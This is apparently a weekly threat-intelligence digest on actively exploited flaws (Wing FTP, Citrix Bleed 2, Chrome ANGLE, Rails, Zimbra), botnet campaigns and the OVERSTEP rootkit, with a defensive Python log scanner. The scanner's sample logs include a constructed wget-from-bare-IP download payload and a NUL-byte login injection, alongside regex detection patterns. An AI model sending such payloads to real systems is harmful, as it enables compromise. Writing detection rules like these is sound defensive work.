Executive Summary
This week in cybersecurity, the threat landscape reflected a surge in exploitation activity and targeted attacks on vulnerable systems. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added one new vulnerability to its Known Exploited Vulnerabilities (KEV) catalog: a critical flaw in Wing FTP Server. Meanwhile, active exploitation persists across widely used platforms including Google Chrome, Citrix NetScaler ADC and Gateway, PHPMailer, Ruby on Rails, and Zimbra Collaboration Suite, signaling attackers' continued focus on popular enterprise technologies.
Botnet activity intensified as multiple families expanded their campaigns. Threat actors behind EnemyBot, Sysrv-k, Andoryu, and Androxgh0st actively scanned for and exploited unpatched flaws in GitLab, Cloud Gateway, and other PHP-based services. Simultaneously, IoT-focused botnets such as Bashlite, BrickerBot, Tsunami, and Mirai ramped up widespread attacks on exposed systems, especially targeting vulnerable Eir D1000 devices, leading to rapid compromise across networks.
In parallel, Google’s Threat Intelligence Group (GTIG) attributed a stealthy intrusion campaign to UNC6148, a threat actor targeting end-of-life SonicWall SMA 100 series appliances. The group deployed a novel malware called OVERSTEP, a user-mode rootkit that alters the boot process, enables credential theft, and ensures long-term persistence. The campaign highlights the continued risk from legacy devices and the use of stolen credentials and anti-forensic techniques to maintain access even post-patching.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insight into the latest emerging and widely discussed threats, helping defenders make informed decisions.
CVE-2025-47812
An Improper Neutralization of Null Byte (NUL) Vulnerability in Wing FTP Server allows remote code execution by injecting arbitrary Lua code into user session files. With a critical CVSS Score of 10.0, this flaw stems from improper handling of the username parameter in the /loginok.html endpoint, as discovered by researchers at RCE Security. Attackers can exploit this flaw by injecting NULL bytes, which the server fails to sanitize properly. Because Wing FTP relies on Lua as its internal scripting engine, this opens the door to arbitrary system command execution under root or SYSTEM privileges. A proof-of-concept (PoC) is publicly available, and the vulnerability has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog. The issue has been patched in version 7.4.4, and immediate upgrading is strongly recommended.
CVE-2025-5777
An Out-of-Bounds Read Vulnerability in Citrix NetScaler ADC and Gateway has raised critical security concerns, earning a CVSS Score of 9.3. Now informally dubbed "Citrix Bleed 2", this flaw arises from insufficient input validation, potentially enabling threat actors to exfiltrate sensitive information or gain unauthorized access to affected systems. A publicly available proof-of-concept (PoC) has further escalated the urgency of this issue. Its recent addition to the CISA Known Exploited Vulnerabilities (KEV) catalog highlights ongoing exploitation in the wild. Organizations running vulnerable versions are strongly advised to apply the latest patches without delay to mitigate the risk of compromise.
CVE-2025-6558
An Improper Input Validation Vulnerability in Google Chrome allows remote attackers to escape the browser sandbox using a specially crafted HTML page. Discovered by Google's Threat Analysis Group, the vulnerability affects Chrome's ANGLE (Almost Native Graphics Layer Engine) and GPU components, where untrusted input isn't properly validated. Since ANGLE translates the WebGL and other graphics API calls to native system instructions, a flaw in this layer creates a critical attack vector potentially allowing attackers to manipulate the rendering process and execute arbitrary code. Google has confirmed that this vulnerability is actively exploited in the wild. A stable channel update has been released for Chrome version 138.0.7204.157/.158 on Windows, Mac, and Linux, with automatic rollout currently underway. Users are strongly urged to update immediately to stay protected.
CVE-2019-5418
A Path Traversal Vulnerability in Ruby on Rails' Action View component has been added to the CISA KEV catalog, signaling confirmed in-the-wild exploitation. Rated with a high CVSS Score of 7.5, this flaw allows attackers to manipulate file paths and potentially access arbitrary files on the system. Originally addressed in March 2019, the issue was patched across multiple Rails versions, including 4.2.11.1, 5.0.7.2, 5.1.6.2, 5.2.2.1, and 6.0.0.beta3 and later. With proof-of-concept code publicly available, the renewed attention underscores the importance of applying long-standing patches, especially for legacy systems still relying on older Rails deployments.
CVE-2019-9621
A Server-Side Request Forgery (SSRF) Vulnerability in the ProxyServlet component of Synacor's Zimbra Collaboration Suite has recently been added to the CISA KEV catalog, highlighting ongoing exploitation activity. With a high CVSS Score of 7.5, this flaw allows attackers to manipulate Zimbra servers into making unauthorized requests to internal or external systems, potentially leading to sensitive data exposure or remote code exposure. Zimbra addressed the issue through multiple patch releases, including 8.7.11 Patch 11, 8.8.9 Patch 10, 8.8.10 Patch 8, 8.8.11 Patch 4, and the full release of 8.8.12 in April 2019. This vulnerability gained notable attention in September 2023 when Trend Micro linked its exploitation to the China-based threat group Earth Lusca, further emphasizing the threat's real-world impact.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
Identified vulnerabilities exploited by botnets, including recent CVEs logged in MISP. Presented here are the top 5 CVEs with payloads suggestive of botnet activity, such as fetching a file with wget from a bare IP address.
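The two sensor-side observations above (NUL bytes in the username parameter of Wing FTP's /loginok.html endpoint, and botnet payloads that invoke wget against a bare IP address) can both be turned into simple log-review rules. The following is an added example written for this digest, not tooling from Loginsoft, CISA or any of the vendors mentioned: it assumes web-server access logs in Common Log Format, constructs four sample lines using documentation IP ranges, and flags the two patterns described in the text. The rule names and the helper functions are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Common Log Format); these are not real telemetry.
# Lines 2 and 3 carry the two patterns described in the digest, lines 1 and 4 are benign.
SAMPLE_LOG = """\
203.0.113.10 - - [14/Jul/2025:10:01:02 +0000] "POST /loginok.html?username=alice&password=x HTTP/1.1" 200 512
203.0.113.11 - - [14/Jul/2025:10:01:05 +0000] "POST /loginok.html?username=bob%00AAAA&password=x HTTP/1.1" 200 512
198.51.100.7 - - [14/Jul/2025:10:02:11 +0000] "GET /index.php?cmd=wget%20http://198.51.100.9/bot.sh HTTP/1.1" 404 0
198.51.100.8 - - [14/Jul/2025:10:03:30 +0000] "GET /docs?url=http://example.com/readme HTTP/1.1" 200 2048
"""

# Common Log Format: client, ident, user, [time], "METHOD TARGET PROTO", status, bytes
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Downloader invocation whose URL host is a bare IPv4 address (hypothetical heuristic,
# modelled on the "wget with IP addresses" payload indicator in the digest).
IPV4_FETCH_RE = re.compile(
    r'\b(?:wget|curl)\b[^;|&\n]*?https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/'
)

def parse_line(line):
    """Split one CLF line into fields; returns None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs percent-decodes values, so an encoded %00 becomes a literal NUL character.
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec

def rule_null_byte_username(rec):
    """Flag /loginok.html requests whose username parameter carries a NUL byte."""
    if rec["path"] != "/loginok.html":
        return None
    for value in rec["query"].get("username", []):
        if "\x00" in value:
            return "nul-byte-in-username"
    return None

def rule_ip_downloader(rec):
    """Flag any parameter value that invokes wget/curl against a bare-IP URL."""
    for values in rec["query"].values():
        for value in values:
            if IPV4_FETCH_RE.search(value):
                return "downloader-with-ip-url"
    return None

RULES = (rule_null_byte_username, rule_ip_downloader)

def scan_log(text):
    """Run every rule over every parseable line; return one finding per rule hit."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for rule in RULES:
            tag = rule(rec)
            if tag:
                findings.append({"src": rec["src"], "path": rec["path"], "rule": tag})
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Running the block prints two findings: the NUL-byte login attempt from 203.0.113.11 and the bare-IP wget fetch from 198.51.100.7. Real Wing FTP and PHP front-end logs may use a different format or may not record request bodies at all, so the regex in `LOG_RE` and the query-string location of the parameters are assumptions to adjust to your own logging; the decoding step matters because a NUL byte is normally encoded as %00 in the raw log and only becomes visible after percent-decoding.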
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is drawn from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
UNC6148 Deploys OVERSTEP Rootkit via EoL SonicWall Exploitation
A sophisticated threat campaign has been observed targeting end-of-life SonicWall SMA 100 series appliances, culminating in the deployment of a stealthy backdoor dubbed OVERSTEP. Attributed to threat actor UNC6148 by Google's Threat Intelligence Group (GTIG), the campaign exploits stolen credentials and OTP seeds from past intrusions to regain access even after patching. While the exact initial access vector remains unknown, exploitation of known vulnerabilities (CVE-2025-32819, CVE-2024-38475, CVE-2021-20035, CVE-2021-20038 and CVE-2021-20039) or the use of a potential zero-day flaw is suspected.
Once access is gained, attackers establish SSL-VPN sessions and spawn a reverse shell, possibly using a previously undocumented method, as shell access isn't normally permitted on these appliances. OVERSTEP modifies the boot process for persistence, implements a user-mode rootkit by hijacking standard library functions (open, readdir, write), and facilitates credential theft and remote command execution via web requests. It also deletes key log entries to evade detection.
UNC6148's tactics demonstrate increasing exploitation of edge devices beyond the reach of traditional security solutions, with implications for data theft, extortion, and potential ransomware deployment.
PRE-NVD observed for this week
PRE-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.
External References
- https://www.cisa.gov/news-events/alerts/2025/07/14/cisa-adds-one-known-exploited-vulnerability-catalog
- https://chromereleases.googleblog.com/2025/07/stable-channel-update-for-desktop_15.html
- https://www.cisa.gov/news-events/alerts/2025/07/10/cisa-adds-one-known-exploited-vulnerability-catalog
- https://thehackernews.com/2025/07/urgent-google-releases-critical-chrome.html
- https://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor